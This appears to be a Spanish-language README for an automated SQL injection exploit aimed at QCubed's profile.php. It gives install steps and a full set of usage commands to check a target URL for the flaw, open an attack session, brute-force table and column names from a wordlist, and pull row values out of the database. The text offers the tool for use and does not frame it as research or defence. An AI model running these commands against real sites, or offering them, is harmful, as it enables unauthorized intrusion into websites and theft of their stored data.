
inyección SQL automatizada para el archivo profile.php de QCubed
Necesitas tener Bun instalado: https://bun.sh
Para instalar las dependencias:
bun install
Para ejecutar:
# mostrar ayuda
bun run exploit -h
# probar si es vulnerable
bun run exploit vulnerable -u https://site.com/framework/assets/_core/php/profile.php
# crear una sesión para un nuevo objetivo
bun run exploit create -n tu_nombre_de_sesion -u https://site.com/framework/assets/_core/php/profile.php
# fuerza bruta de tablas
bun run exploit brute-table -n tu_nombre_de_sesion -w ruta/al/wordlist.txt
# mostrar tablas encontradas o columnas de una tabla
bun run exploit show-table -n tu_nombre_de_sesion
bun run exploit show-column -n tu_nombre_de_sesion -t nombre_de_tabla
# fuerza bruta de id
bun run exploit brute-id -n tu_nombre_de_sesion -t nombre_de_tabla -i 1
# fuerza bruta de valor de fila
# opcionalmente añade -r para reanudar la fuerza bruta desde donde se detuvo
bun run exploit brute-column -n tu_nombre_de_sesion -t nombre_de_tabla -c nombre_de_columna -i 1
# mostrar pares clave-valor encontrados de una tabla
# opcionalmente `-i id_value` para mostrar solo un id particular
bun run exploit show-rows -n tu_nombre_de_sesion -t nombre_de_tabla